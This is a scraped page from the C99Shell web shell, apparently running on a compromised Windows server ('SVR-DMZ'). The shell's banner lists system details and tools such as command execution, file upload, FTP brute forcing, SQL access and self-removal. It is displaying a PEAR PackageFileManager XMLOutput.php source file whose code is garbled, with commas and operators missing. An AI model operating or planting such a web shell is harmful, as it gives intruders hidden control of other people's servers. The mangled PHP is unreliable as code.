!C99Shell v. 1.0 pre-release build #13!

Software: Apache. PHP/5.5.15 

uname -a: Windows NT SVR-DMZ 6.1 build 7600 (Windows Server 2008 R2 Enterprise Edition) i586 

SYSTEM 

Safe-mode: OFF (not secure)

C:\Intranet\C\xampp\php\PEAR\PEAR\PackageFileManager\   drwxrwxrwx
Free 4.09 GB of 39.52 GB (10.36%)
Detected drives: [ a ] [ c ] [ d ] [ e ] [ f ]
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    Encoder    Tools    Proc.    FTP brute    Sec.    SQL    PHP-code    Update    Feedback    Self remove    Logout    


Viewing file:     XMLOutput.php (6.95 KB)      -rw-rw-rw-
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |
<?php
/**
 * Class for XML output
 *
 * LICENSE: This source file is subject to version 3.01 of the PHP license
 * that is available through the world-wide-web at the following URI:
 * http://www.php.net/license/3_01.txt.  If you did not receive a copy of
 * the PHP License and are unable to obtain it through the web, please
 * send a note to license@php.net so we can mail you a copy immediately.
 *
 * @category   pear
 * @package    PEAR_PackageFileManager
 * @author     Greg Beaver <cellog@php.net>
 * @copyright  2004-2006 The PHP Group
 * @license    http://www.php.net/license/3_01.txt  PHP License 3.01
 * @version    CVS: $Id: XMLOutput.php,v 1.5 2006/04/22 16:49:24 farell Exp $
 * @link       http://pear.php.net/package/PEAR_PackageFileManager
 * @since      File available since Release 1.2.0
 */

/**
 * Class for XML output
 *
 * @category   pear
 * @package    PEAR_PackageFileManager
 * @author     Greg Beaver <cellog@php.net>
 * @copyright  2004-2006 The PHP Group
 * @license    http://www.php.net/license/3_01.txt  PHP License 3.01
 * @version    Release: 1.6.0
 * @link       http://pear.php.net/package/PEAR_PackageFileManager
 * @since      Class available since Release 1.2.0
 */

class PEAR_PackageFileManager_XMLOutput extends PEAR_Common
{
    
/**
     * Generate part of an XML description with release information.
     *
     * @param array  $pkginfo    array with release information
     * @param bool   $changelog  whether the result will be in a changelog element
     *
     * @return string XML data
     *
     * @access private
     */
    
function _makeReleaseXml($pkginfo$changelog false)
    {
        
$indent $changelog "  " "";
        
$ret "$indent  <release>\n";
        if (!empty(
$pkginfo['version'])) {
            
$ret .= "$indent    <version>$pkginfo[version]</version>\n";
        }
        if (!empty(
$pkginfo['release_date'])) {
            
$ret .= "$indent    <date>$pkginfo[release_date]</date>\n";
        }
        if (!empty(
$pkginfo['release_license'])) {
            
$ret .= "$indent    <license>$pkginfo[release_license]</license>\n";
        }
        if (!empty(
$pkginfo['release_state'])) {
            
$ret .= "$indent    <state>$pkginfo[release_state]</state>\n";
        }
        if (!empty(
$pkginfo['release_notes'])) {
            
$ret .= "$indent    <notes>".htmlspecialchars($pkginfo['release_notes'])."</notes>\n";
        }
        if (!empty(
$pkginfo['release_warnings'])) {
            
$ret .= "$indent    <warnings>".htmlspecialchars($pkginfo['release_warnings'])."</warnings>\n";
        }
        if (isset(
$pkginfo['release_deps']) && sizeof($pkginfo['release_deps']) > 0) {
            
$ret .= "$indent    <deps>\n";
            foreach (
$pkginfo['release_deps'] as $dep) {
                
$ret .= "$indent      <dep type=\"$dep[type]\" rel=\"$dep[rel]\"";
                if (isset(
$dep['version'])) {
                    
$ret .= " version=\"$dep[version]\"";
                }
                if (isset(
$dep['optional'])) {
                    
$ret .= " optional=\"$dep[optional]\"";
                }
                if (isset(
$dep['name'])) {
                    
$ret .= ">$dep[name]</dep>\n";
                } else {
                    
$ret .= "/>\n";
                }
            }
            
$ret .= "$indent    </deps>\n";
        }
        if (isset(
$pkginfo['configure_options'])) {
            
$ret .= "$indent    <configureoptions>\n";
            foreach (
$pkginfo['configure_options'] as $c) {
                
$ret .= "$indent      <configureoption name=\"".
                    
htmlspecialchars($c['name']) . "\"";
                if (isset(
$c['default'])) {
                    
$ret .= " default=\"" htmlspecialchars($c['default']) . "\"";
                }
                
$ret .= " prompt=\"" htmlspecialchars($c['prompt']) . "\"";
                
$ret .= "/>\n";
            }
            
$ret .= "$indent    </configureoptions>\n";
        }
        if (isset(
$pkginfo['provides'])) {
            foreach (
$pkginfo['provides'] as $key => $what) {
                
$ret .= "$indent    <provides type=\"$what[type]\" ";
                
$ret .= "name=\"$what[name]\" ";
                if (isset(
$what['extends'])) {
                    
$ret .= "extends=\"$what[extends]\" ";
                }
                
$ret .= "/>\n";
            }
        }
        if (isset(
$pkginfo['filelist'])) {
            
$ret .= "$indent    <filelist>\n";
            
$ret .= $this->_doFileList($indent$pkginfo['filelist'], '/');
            
$ret .= "$indent    </filelist>\n";
        }
        
$ret .= "$indent  </release>\n";
        return 
$ret;
    }

    
/**
     * Generate the <filelist> tag
     * @access private
     * @return string
     */
    
function _doFileList($indent$filelist$curdir)
    {
        
$ret '';
        foreach (
$filelist as $file => $fa) {
            if (isset(
$fa['##files'])) {
                
$ret .= "$indent      <dir";
            } else {
                
$ret .= "$indent      <file";
            }

            if (isset(
$fa['role'])) {
                
$ret .= " role=\"$fa[role]\"";
            }
            if (isset(
$fa['baseinstalldir'])) {
                
$ret .= ' baseinstalldir="' .
                    
htmlspecialchars($fa['baseinstalldir']) . '"';
            }
            if (isset(
$fa['md5sum'])) {
                
$ret .= " md5sum=\"$fa[md5sum]\"";
            }
            if (isset(
$fa['platform'])) {
                
$ret .= " platform=\"$fa[platform]\"";
            }
            if (!empty(
$fa['install-as'])) {
                
$ret .= ' install-as="' .
                    
htmlspecialchars($fa['install-as']) . '"';
            }
            
$ret .= ' name="' htmlspecialchars($file) . '"';
            if (isset(
$fa['##files'])) {
                
$ret .= ">\n";
                
$recurdir $curdir;
                if (
$recurdir == '///') {
                    
$recurdir '';
                }
                
$ret .= $this->_doFileList("$indent "$fa['##files'], $recurdir $file '/');
                
$displaydir $curdir;
                if (
$displaydir == '///' || $displaydir == '/') {
                    
$displaydir '';
                }
                
$ret .= "$indent      </dir> <!-- $displaydir$file -->\n";
            } else {
                if (empty(
$fa['replacements'])) {
                    
$ret .= "/>\n";
                } else {
                    
$ret .= ">\n";
                    foreach (
$fa['replacements'] as $r) {
                        
$ret .= "$indent        <replace";
                        foreach (
$r as $k => $v) {
                            
$ret .= $k=\"" htmlspecialchars($v) .'"';
                        }
                        
$ret .= "/>\n";
                    }
                    
$ret .= "$indent      </file>\n";
                }
            }
        }
        return 
$ret;
    }
}
?>

:: Command execute ::

Enter:
 
Select:
 

:: Search ::
  - regexp 

:: Upload ::
 
[ ok ]

:: Make Dir ::
 
[ ok ]
:: Make File ::
 
[ ok ]

:: Go Dir ::
 
:: Go File ::
 

--[ c99shell v. 1.0 pre-release build #13 powered by Captain Crunch Security Team | http://ccteam.ru | Generation time: 0.0156 ]--